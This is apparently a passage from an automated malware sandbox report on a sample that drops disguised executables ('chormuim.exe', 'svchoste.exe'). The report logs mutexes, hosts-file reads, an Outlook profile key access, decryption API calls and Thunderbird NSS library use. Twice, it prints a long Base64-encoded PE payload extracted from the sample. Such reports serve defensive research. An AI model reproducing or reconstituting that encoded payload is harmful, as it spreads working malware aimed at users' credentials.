BICKBEAAAottt4OEgL+FgIAABtvEgAACtwHKBMAAAreAybeACoBKAAAAAA+ADZ0AAMCAAABAgA0AE6CAA4AAAAAAAAAAJiYAAMCAAABEzADACcAAAACAAARfgMAAAQKBgsHAigWAAAKdAQAAAIMfwMAAAQIBygBAAArCgYHM+AqABMwAwAnAAAAAgAAEX4DAAAECgYLBwIoGAAACnQEAAACDH8DAAAECAcoAQAAKwoGBzPgKgATMAMAJwAAAAMAABF+BgAABAoGCwcCKBYAAAp0BgAAAgx/BgAABAgHKAIAACsKBgcz4CoAEzADACcAAAADAAARfgYAAAQKBgsHAigYAAAKdAYAAAIMfwYAAAQIBygCAAArCgYHM+AqABMwAwBWAAAAAAAAAH4EAAAEfgwAAAQlLRcmfgoAAAT+BiAAAAZzHQAACiWADAAABG8eAAAKJn4EAAAEfgQAAAT+Bh8AAApzHQAACm8eAAAKJn4EAAAEbyAAAAoUgAQAAAQqAAATMAQAgQAAAAQAABEDKCQAAAoKBiAIAwAALgoGIA0DAAAuJitgAigWAAAGfgUAAAQDKCQAAAoDKCUAAAoDKCYAAAooFAAABiYqAyglAAAKfgUAAAQoJwAACiwMAygmAAAKgAUAAAQqfgUAAAQDKCQAAAoDKCUAAAoDKCYAAAooFAAABiYqAgMoKAAACioAAAATMAMAkAAAAAUAABEoKQAACgoSAf4VAwAAG34JAAAEDRYTBCs1CREEmhMFBhEFbyoAAAosHxIB0AkAAAIoKwAAChEFKCwAAAqlCQAAAigtAAAKKw0RBBdYEwQRBAmOaTLEBhIB/hYDAAAbby4AAApvLwAACgwILAkSASgwAAAKLQEqfgYAAAQsEn4GAAAEEgEoMQAACghvGgAABipCU0pCAQABAAAAAAAMAAAAdjQuMC4zMDMxOQAAAAAFAGwAAAAoCQAAI34AAJQJAAAYCAAAI1N0cmluZ3MAAAAArBEAABAEAAAjVVMAvBUAABAAAAAjR1VJRAAAAMwVAAAAAwAAI0Jsb2IAAAAAAAAAAgAAAVddth0JCgAAAPolMwA
Source: 5.2.dll.exe.10000.0.unpack, Forms.cs Base64 encoded string: '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
Source: 5.0.dll.exe.10000.0.unpack, Forms.cs Base64 encoded string: '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
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6644:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Mutant created: \Sessions\1\BaseNamedObjects\DA31A2B5902E335BCE2AB927B5D26FC7
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6676:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6504
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Command line argument: 08A 6_2_00413780
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.0.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.920000.0.unpack, b1ywBlv1PRTdOXiqBh/p1ZAX35aDeHYoRgts9.cs Cryptographic APIs: 'CreateDecryptor'
Source: DotNetZip.dll.8.dr, Ionic/Zip/WinZipAesCipherStream.cs Cryptographic APIs: 'TransformBlock'
Source: DotNetZip.dll.8.dr, Ionic/Zip/WinZipAesCipherStream.cs Cryptographic APIs: 'TransformFinalBlock'
Source: DotNetZip.dll.8.dr, Ionic/Zip/WinZipAesCipherStream.cs Cryptographic APIs: 'TransformFinalBlock', 'TransformBlock'
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WerFault.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: pnrpnsp.pdbO source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: svchoste.exe, 00000004.00000003.305330461.0000000003821000.00000004.00000001.sdmp, mozglue.dll.4.dr
Source: Binary string: System.Configuration.ni.pdbNW source: WerFault.exe, 0000001D.00000003.386970351.0000026D7084D000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: crypt32.pdbU source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: winnsi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.ni.pdb0 source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp
Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: 0C:\Windows\mscorlib.pdb source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
Source: Binary string: schannel.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: mscorlib.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.376804497.0000026D6FE62000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: msvcrt.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: shcore.pdbo source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: i.pdb source: WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp
Source: Binary string: msasn1.pdb{ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: svchoste.exe, 00000004.00000003.300385221.0000000003821000.00000004.00000001.sdmp, softokn3.dll.4.dr
Source: Binary string: ole32.pdba source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: edputil.pdbc source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: kernelbase.pdb0 source: WerFault.exe, 0000001D.00000003.377311889.0000026D6FDDC000.00000004.00000001.sdmp
Source: Binary string: gdiplus.pdbX source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: WLDP.pdbG source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: clrjit.pdbD source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: rasadhlp.pdbR source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Windows.Forms.ni.pdbRSDS5 source: WER5768.tmp.dmp.29.dr
Source: Binary string: nsi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ source: WER5768.tmp.dmp.29.dr
Source: Binary string: _.pdbHD source: chormuimii.exe, 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, chormuimii.exe, 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, chormuimii.exe, 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp
Source: Binary string: gpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: powrprof.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: dnsapi.pdbq source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: ole32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: NapiNSP.pdb[ source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: msasn1.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: msvcp140.i386.pdbGCTL source: svchoste.exe, 00000004.00000003.306645593.000000000389F000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.307329985.0000000003821000.00000004.00000001.sdmp, svchoste.exe, 00000004.00000003.306386681.0000000003821000.00000004.00000001.sdmp, msvcp140.dll.4.dr
Source: Binary string: mscorlib.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387150738.0000026D70951000.00000004.00000040.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: winrnr.pdb: source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: msvcp_win.pdbO_ source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER5768.tmp.dmp.29.dr
Source: Binary string: mscorlib.ni.pdbRSDS] source: WER5768.tmp.dmp.29.dr
Source: Binary string: dpapi.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: psapi.pdbz source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdb source: WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source: Binary string: System.Xml.ni.pdbRSDS source: WER5768.tmp.dmp.29.dr
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: svchoste.exe, 00000004.00000003.304315459.0000000003821000.00000004.00000001.sdmp, freebl3.dll.4.dr
Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: kernelbase.pdb source: WerFault.exe, 0000001D.00000003.377311889.0000026D6FDDC000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdbRSDSD source: WER5768.tmp.dmp.29.dr
Source: Binary string: dhcpcsvc.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: winnsi.pdbL source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: combase.pdb8 source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: z:\task_1542148442\build\src\obj-thunderbird\security\nss3.pdb source: nss3.dll.4.dr
Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdbK source: chormuim.exe, 00000008.00000003.350829566.000000001B765000.00000004.00000001.sdmp
Source: Binary string: vaultcli.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: fltLib.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: System.Core.ni.pdb source: WerFault.exe, 0000001D.00000002.398402087.0000026D710C0000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.387336792.0000026D70950000.00000004.00000040.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp, WER5768.tmp.dmp.29.dr
Source: Binary string: shell32.pdb source: WerFault.exe, 0000001D.00000003.386851894.0000026D7095F000.00000004.00000040.sdmp
Source: Binary string: sspicli.pdb source: WerFault.exe, 0000001D.00000003.387098966.0000026D7096C000.00000004.00000001.sdmp, WerFault.exe, 0000001D.00000003.386837364.0000026D70965000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: chormuim.exe, 00000008.00000002.409878846.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.374653596.000000001D4F8000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.367278251.000000001D4F8000.00000004.00000010.sdmp
